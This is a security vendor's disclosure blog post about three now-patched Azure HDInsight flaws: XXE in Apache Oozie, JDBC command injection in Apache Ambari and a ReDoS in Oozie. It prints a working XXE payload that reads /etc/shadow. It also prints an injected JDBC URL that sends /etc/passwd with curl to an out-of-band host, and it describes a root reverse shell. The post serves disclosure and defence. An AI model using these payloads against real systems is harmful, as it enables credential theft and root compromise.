Azure HDInsight: The Sequel – Unveiling 3 New Vulnerabilities That Could Have Led to Privilege Escalations and Denial of Service

Orca has discovered three new vulnerabilities within various Azure HDInsight third-party services, including Apache Hadoop, Spark, and Kafka. These services are integral components of Azure HDInsight, a widely used managed service offered within the Azure ecosystem.

Two of the vulnerabilities could have led to Privilege Escalation (PE) and one could have been used to cause a Regex Denial of Service (ReDoS). These discoveries come in quick succession after our previous finding of 8 XSS vulnerabilities in Azure HDInsight.

We immediately informed the Microsoft Security Response Center (MSRC), which assigned CVEs to two of the vulnerabilities and promptly fixed all three issues in its October 26th security update. In this blog, we’ll describe in detail how we discovered the vulnerabilities and who could have been affected.

Executive Summary:

- Orca discovered three important vulnerabilities within various Azure HDInsight third-party services, including Apache Hadoop, Spark, and Kafka. Two are Privilege Escalation (PE) vulnerabilities and one is a Regex Denial of Service (ReDoS) vulnerability.

- These findings are in addition to our discovery of 8 XSS vulnerabilities in Azure HDInsight, published on September 13, 2023.

- The new vulnerabilities affect any authenticated user of Azure HDInsight services such as Apache Ambari and Apache Oozie.

- The two PE vulnerabilities on Apache Ambari and Apache Oozie allowed an authenticated attacker with HDI cluster access to send a network request and gain cluster administrator privileges – allowing them to read, write, delete and perform all resource service management operations.

- The ReDoS vulnerability on Apache Oozie was caused by a lack of proper input validation and constraint enforcement, and allowed an attacker to request a large range of action IDs and cause an intensive loop operation, leading to a Denial of Service (DoS). This would disrupt operations, cause degradation of performance, and negatively impact both the availability and reliability of the Oozie system, including its dashboard, hosts, and jobs.

- Upon discovering these vulnerabilities, we leveraged our strong relationship with the Microsoft MSRC team to report them promptly. The team immediately prioritized these cases, and Orca assisted the MSRC team in reproducing and fixing the issues over several phone calls.

- All issues have been resolved by Microsoft. Users will need to update their HDInsight instances with the latest Microsoft security patch to be protected.

About the 3 Vulnerabilities in Azure HDInsight

Below we have included an overview of the three new vulnerabilities that we found in Azure HDInsight. To protect against these vulnerabilities, organizations must apply Microsoft’s security update as specified below. However, HDInsight doesn’t support in-place upgrades so users must create a new cluster with the desired component and latest platform version that includes the security updates. Next, they should migrate their applications to use the new cluster. See Azure HDInsight upgrade instructions for further information.

What is Azure HDInsight?

Azure HDInsight is a fully managed, open-source analytics service provided by Microsoft to efficiently process large-scale big data workloads in a scalable and flexible manner. It operates as a cloud-based service that streamlines the management, processing, and analysis of big data by offering a range of data processing frameworks, such as Apache Hadoop, Apache Spark, Apache Kafka, and more.

For more background and specific details on Azure HDInsight, as well as eight other XSS vulnerabilities we found in the service, please read our previous blog post ‘Azure HDInsight Riddled With XSS Vulnerabilities via Apache Services.’

Case #1: Azure HDInsight Apache Oozie Workflow Scheduler XXE Elevation of Privileges

Apache Oozie is a workflow scheduler for Hadoop that allows users to define and link together a series of big data processing tasks. It coordinates and schedules these tasks, executing them in a specified order or at specific times. It integrates with the Hadoop ecosystem, providing a system for automated, complex data processing workflows.

Vulnerability Description

We found that Azure HDInsight / Apache Oozie Workflow Scheduler had a vulnerability that allowed low-privilege users to read files at root level and escalate their privileges. The vulnerability was caused by a lack of proper user input validation.

This vulnerability is known as an XML External Entity (XXE) injection attack. Attackers can exploit XXE vulnerabilities to read arbitrary files on the server, including sensitive system files. They can also use this vulnerability to escalate privileges.
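To make this class of bug concrete, here is a minimal defensive sketch in Python. The affected components are written in Java, so this is not the code that was patched. It assumes the simplest possible policy: refuse any XML body that carries a DOCTYPE declaration, which removes the entity definitions an XXE payload depends on. The names `parse_without_doctype` and `DoctypeForbidden` are ours, chosen for illustration.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an XML document carries a DOCTYPE declaration."""


def parse_without_doctype(xml_text: str) -> list:
    """Parse xml_text and return its element names, refusing any DOCTYPE."""
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort before any entity declared in the DTD can be used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)
    return names
```

A plain job definition parses normally, while a body that declares an external entity is rejected before the entity can be expanded. Rejecting DOCTYPE outright is a blunt choice; a service that genuinely needs DTDs would instead have to disable external entity resolution in its parser.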

Attack Workflow

We’ll start by creating the service. This time, we’ll create a Spark cluster.



After creating the service, we navigate as an Admin to the Apache Ambari Management Dashboard and create a Low Privilege user for this POC.



Next, we navigate to Users and create a new user called “low” with the Cluster User role (the lowest level in Apache Ambari). We then create the Workflow Service by navigating to Views and creating it with default parameters.





After creating the service, go to Views and click on the Pencil icon to edit the endpoint so the low user can reach it as well. Next, we grant permission to the Low Privilege User –







In order to enter the service itself, we need to assign it a URL suffix. We assign a random name such as workflowservice –





Now we can see that our “low” user is listed under View Permissions and we are good to go. We log out from the Admin user, sign in again as the “low” user, and enter the Workflow Service Dashboard –





Behind the scenes, we can validate that our user is indeed the one using the service. We can do so by decoding the low user’s base64-encoded credentials –


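As a rough sketch of that check, and assuming the request carries a standard HTTP Basic `Authorization` header (which the base64-encoded credentials suggest), the username can be recovered as follows. The function name and the sample credentials are made up for illustration and are not taken from the POC.

```python
import base64


def basic_auth_username(header_value: str) -> str:
    """Return the username from an 'Authorization: Basic ...' header value."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic" or not token:
        raise ValueError("not a Basic authorization header")
    decoded = base64.b64decode(token.strip()).decode("utf-8")
    username, sep, _password = decoded.partition(":")
    if not sep:
        raise ValueError("credentials are not in user:password form")
    return username


# Example with made-up credentials.
example = "Basic " + base64.b64encode(b"low:not-a-real-password").decode("ascii")
print(basic_auth_username(example))
```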

Among the various requests that are being sent, we can see that getcurrentUserName returns ‘low’, which verifies that we are currently operating and sending requests in the context of the low privileges user –

Before jumping in, let’s explain more about the architecture of the Workflow –

As we can see from the following screenshot, when creating various services or components, the user can save and upload files through the dashboard, but is limited to certain types of folders.

For example, the following screen is showing a GET request that is being made by the user, when they navigate through the various folders in the Dashboard itself.

For instance, when a user creates a new Workflow, the following request is being sent –



https://research-insight.azurehdinsight.net/api/v1/views/WORKFLOW_MANAGER/versions/1.0.0/instances/workflowservice/resources/proxy/readWorkflowXml?workflowXmlPath=



We can play with it a bit to see whether the workflowXmlPath query string is vulnerable to SSRF, LFI, or similar issues. Although it is not vulnerable, we can still check whether certain files exist in the OS, for example /etc/passwd.

We can see that the passwd file does not exist –

What about the etc folder then?

It seems that the /etc/ folder does exist, but no passwd file.
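The probing above only varies one query parameter. A small sketch of how such probe URLs can be assembled is shown here; it builds the URL and does not send anything. The endpoint path is the one from the request above, while the helper name and its parameters are our own.

```python
from urllib.parse import urlencode

# Path of the Workflow Manager view proxy, as seen in the request above.
VIEW_PATH = (
    "/api/v1/views/WORKFLOW_MANAGER/versions/1.0.0/instances/{instance}"
    "/resources/proxy/readWorkflowXml"
)


def read_workflow_xml_url(cluster_host: str, instance: str, workflow_xml_path: str) -> str:
    """Build the readWorkflowXml URL for a candidate path (URL-encoded)."""
    query = urlencode({"workflowXmlPath": workflow_xml_path})
    return f"https://{cluster_host}{VIEW_PATH.format(instance=instance)}?{query}"


for candidate in ("/etc/passwd", "/etc/"):
    print(read_workflow_xml_url("research-insight.azurehdinsight.net", "workflowservice", candidate))
```

Comparing the responses for different candidate paths is what reveals whether the server treats a path as existing.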

Back to the workflow









In order to examine the functionality of the dashboard, we’ve landed in the Coordinator component. We’ll create a new Coordinator by clicking on Create and then Coordinator, give it a name, and choose a non-existent file or folder. Next, we’ll set the Start and End Time –



Once done, we hit Save.

Again, we choose a random location and hit Save –

After saving the Coordinator, click Submit in order to send the Coordinator Job to the server. We can see that indeed our Coordinator was saved and scheduled –

After we configured the Job, we check the requests that are being made, especially the last request to Submit the Job –



We can see that the Job is being sent as an XML payload, without a desired name and location –

After sending the body, a new Job ID is created, but we’re not interested in that.

Let’s modify the request Body a bit –

(In order to avoid creating a new Job, you can change the path to something random such as /tmp/doesnotexist and the overwrite query string to true.)





We can see that changing the body to a generic XXE payload triggers a NullPointerException.





We send a malformed XML payload –



That’s better. We got a Parser exception, specifically – SAXParseException.

Root Cause Analysis





On further inspection of the specific method (submitJob), we can see that the body is passed to formatXML –





From the Stack Trace, reviewing the Utils.java file we can see our previous exception (SAXParseException) –

Examining the specific exception, it seems that it could be vulnerable to XXE but we need to verify it first.

Almost there





After some trial and error, we managed to get an out-of-band (OOB) interaction by sending the following payload to the server –

Great, we can see in the following screenshot that the request was made, meaning that we are getting closer –

Let’s try grabbing the /etc/passwd file –

We can see it failed, BUT we also know that the file is there due to the systemId and the markup error –



DTD FTW

We’ll change the payload and use an external DTD file hosted on our remote host by setting up the following –

- A remote DTD that will assign /etc/passwd to the “file” variable and later send its content via the <!ENTITY>.

- An Ngrok server that will host the DTD file.

Sending the request –

We got its content, but what about root level file access?

Sending the 2nd request for /etc/shadow –

Now we accomplished a full root level file reading.





A non-DTD payload that we managed to find working –

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % constant 'aaa)>
<!ENTITY % file SYSTEM "file:///etc/shadow">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message>Text</message>
```

Let’s see what else we can find to elevate our privileges –

/etc/ambari-server/conf/ambari.properties – Containing all JDBC connection strings to the cluster DB, including passwords, username etc.

Among these are the certificates files for the cluster –

Potential Impact of the Vulnerability

XML External Entity (XXE) Processing, Local file read, Privilege Escalation

Case #2: Azure HDInsight Apache Ambari JDBC Injection Elevation of Privileges

Apache Ambari is an open-source tool for simplifying the deployment, management, and monitoring of Hadoop clusters. In the context of Azure, it streamlines Hadoop cluster setup, management, configuration, and monitoring. It also enables easy scaling, security implementation, and integration with Azure services, enhancing the big data solution on Azure.

User and Role Types in Apache Ambari

Following the documentation here –

Access levels allow administrators to categorize cluster users and groups based on the permissions that each level includes.

Ambari Administrator: Ambari Administrator users have full control over all aspects of Ambari. This includes the ability to create clusters, change cluster names, register new versions of cluster software, and fully control all clusters managed by the Ambari instance.

These roles enable fine-grained control over cluster operations and access permissions, catering to different user needs.

When creating new HDInsight Cluster of any kind, there are two users that are created as Ambari Administrator:

- admin

- hdinsightwatchdog

As described above, the admin has full control over the cluster and can add and delete resources, services, users, groups, and so on. For this demonstration, we’ll set up a new low-privilege user called lowprivuser, which only has the Cluster Operator role.

POC Workflow



We start by creating a new HDInsight Cluster – Hadoop –

Next as admin, we’ll navigate to Manage Ambari, and from there to Users –





We create a new lowprivuser and assign it as Cluster Operator –

We can see that we are missing relevant Admin Capabilities –



Next we navigate to Hive, and Under Configs click on Database –



From the screenshot below, we can see that we are able to test the Hive database configuration by clicking on TEST CONNECTION –







After clicking Test Connection, we can review the request in Burp –

The request action is called check_host and is allowed only for certain types of users in the cluster, among them the Cluster Operator.





After researching known JDBC attack techniques, we decided to try changing the different variables in the cluster dashboard while observing stderr and stdout –



Let’s try and manipulate the JDBC url endpoint by adding the following –

"db_connection_url":"jdbc:sqlserver://research-orca.database.windows.net;database=research;encrypt=true;trustServerCertificate=true;create=false;loginTimeout=300;$(cat /etc/passwd | curl --data-binary @- -m 5 http://l7t5293jxrhivs5s1c0301y7zy5ptmhb.oastify.com | echo 1)"

Checking the collaborator –



Next we send a reverse shell payload –

Got a reverse shell as root –

Potential Impact of the Vulnerability

A Cluster Operator can manipulate the request by injecting malicious code and gain root access on the cluster’s main host.
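The fact that `$(...)` inside the URL was evaluated suggests that the value reached a shell command line. We have not shown the server-side code here, so the following Python sketch only illustrates the general mitigation under that assumption: validate the value, and pass it as a single argument so that no shell ever parses it. All names are hypothetical, and the child process simply echoes its argument in place of a real connection check.

```python
import subprocess
import sys

# Characters a shell would interpret and that a plain JDBC URL should not need.
FORBIDDEN = set("$`|<>()\\'\"\r\n")


def looks_like_plain_jdbc_url(url: str) -> bool:
    """Accept only values that start with 'jdbc:' and carry no shell metacharacters."""
    return url.startswith("jdbc:") and not any(ch in FORBIDDEN for ch in url)


def echo_argument(value: str) -> str:
    """Hand the value to a child process as one argv element (no shell involved)."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()


def run_connection_check(url: str) -> str:
    """Validate first, then pass the URL without shell interpretation."""
    if not looks_like_plain_jdbc_url(url):
        raise ValueError("rejected suspicious JDBC URL")
    return echo_argument(url)
```

Even without the validation step, `echo_argument` receives a string such as `jdbc:x;$(echo hi)` literally, because an argument list bypasses shell expansion. The allowlist is deliberately strict and would need adjusting for drivers whose URLs legitimately use some of these characters.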

Case #3: Azure HDInsight Apache Oozie Regex Denial Of Service via vulnerable parameter

As mentioned in Case #1, Apache Oozie is a workflow scheduler for Hadoop that allows users to define and link together a series of big data processing tasks. It coordinates and schedules these tasks, executing them in a specified order or at specific times. It integrates with the Hadoop ecosystem, providing a system for automated, complex data processing workflows.

Vulnerability Description







The code provided allows a user to request logs for a specific job by specifying a range of actions. Due to the lack of proper input validation and constraint enforcement, an attacker can request a large range of action IDs. This causes an intensive loop operation within the system, leading to a Denial of Service (DoS) vulnerability.

Root Cause Analysis

Effects

- Oozie Dashboard: The DoS attack could slow down or completely halt the Oozie dashboard, making it unresponsive. The dashboard might become inaccessible for legitimate users as the server is consumed with processing the malicious request(s).

- Oozie Hosts: The affected hosts running the Oozie service may experience increased CPU and memory utilization. This can lead to performance degradation across other services on the host, affecting overall system stability.

- Oozie Jobs: The heavy processing induced by the malicious request can impede the system’s ability to schedule and manage other Oozie jobs. It may lead to delays, failures, or incorrect scheduling, affecting the timely execution and reliability of workflows and data processing tasks within the Oozie framework.

Overall, this vulnerability has the potential to disrupt normal operations, cause degradation of performance, and negatively impact both the availability and reliability of the Oozie system, including its dashboard, hosts, and jobs.

POC Workflow

We start by creating the service, this time a Hadoop Cluster.

After creating the service, we navigate as an Admin to the Apache Ambari Management Dashboard and create a Low Privilege user for this POC. Next we navigate to Users.

We create a new user called “low” with the Cluster User role (the lowest level in Apache Ambari) –

Next, we create the Workflow Service by navigating to Views and creating it with default parameters.

After creating the service, navigate to Views and edit the endpoint so the low user can reach it as well.

In order to enter the service itself, we need to assign it with a URL suffix. Click on Create New URL and assign a random name such as workflowservice –

Now, we log out from the Admin user and sign in again as the low user, and enter the Workflow Service Dashboard –

Behind the scenes, we can validate that our user is indeed the one using the service. We can do so by decoding the low user’s base64-encoded credentials –



Let’s enter the Workspace dashboard and create a new Bundle/Workflow/Coordinator job –



The request itself is a simple PUT request that aims to disable the SLA action.

The orSeparatedActions string is built by concatenating action IDs with the OR operator (|) and brackets, which can lead to a Regular Expression Denial of Service. If many action IDs are provided, especially as a large range, the result is a very long expression with many OR alternatives.
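The growth described above can be sketched in a few lines of Python. This is not Oozie’s code: the `(jobId@N)` shape of each alternative, the function names, and the cap of 50 actions are assumptions made for illustration. The point is only that the expression grows linearly with the requested range unless the range is bounded first.

```python
MAX_ACTIONS = 50  # hypothetical cap, chosen for illustration


def or_separated_actions(job_id: str, first: int, last: int) -> str:
    """Unbounded variant: one '(job@N)' alternative per action in the range."""
    return "|".join(f"({job_id}@{n})" for n in range(first, last + 1))


def bounded_or_separated_actions(job_id: str, first: int, last: int,
                                 limit: int = MAX_ACTIONS) -> str:
    """Same expression, but the range is validated before anything is built."""
    if first < 1 or last < first:
        raise ValueError("invalid action range")
    if last - first + 1 > limit:
        raise ValueError(f"range exceeds {limit} actions")
    return or_separated_actions(job_id, first, last)


print(or_separated_actions("job-C", 1, 3))
print(len(or_separated_actions("job-C", 1, 10000)))
```

Checking the size of the range before building the expression keeps both the loop and the resulting pattern small, regardless of what the caller requests.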

Watch the video to see the full POC workflow:

About the Orca Research Pod

The Orca Research Pod discovers and analyzes cloud risks and vulnerabilities to strengthen the Orca platform and promote cloud security best practices. Orca’s expert security research team has discovered several critical vulnerabilities in public cloud provider platforms, and continues to investigate different cloud products and services to find zero-day vulnerabilities before any malicious actors do. So far, Orca has discovered 20+ major vulnerabilities in Azure, AWS, and Google Cloud, and worked with cloud and service providers to resolve them.

About Orca Security

Orca’s agentless cloud security platform connects to your environment in minutes and provides full visibility of all your assets on AWS, Azure, Google Cloud, Kubernetes, and more. Orca detects, prioritizes, and helps remediate cloud risks across every layer of your cloud estate, including vulnerabilities, malware, misconfigurations, lateral movement risk, API risks, sensitive data at risk, weak and leaked passwords, and overly permissive identities.